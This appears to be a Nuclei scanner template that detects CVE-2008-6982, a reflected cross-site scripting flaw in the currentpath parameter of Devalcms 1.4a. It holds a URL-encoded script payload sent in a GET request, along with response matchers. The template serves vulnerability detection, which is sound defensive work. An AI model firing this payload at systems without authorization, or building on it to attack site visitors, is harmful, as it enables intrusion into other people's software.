id: CVE-2008-6982 info: name: Devalcms 1.4a - Cross-Site Scripting author: arafatansari severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/6369 - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 epss-percentile: 0.69949 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: devalcms product: devalcms tags: cve,cve2008,devalcms,xss,cms,edb http: - method: GET path: - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - 'sub menu for: ' - type: word part: header words: - text/html - type: status status: - 500 # digest: 4a0a0047304502202142b24437a1c386b819b4da681f31737b68aa7316baf42b2b5358c99873aa69022100eb5626f8aa013b6fb38b06dc3d2785976fa4c102c08f1093c8f645faa1aef36b:922c64590222798bb761d5b6d8e72950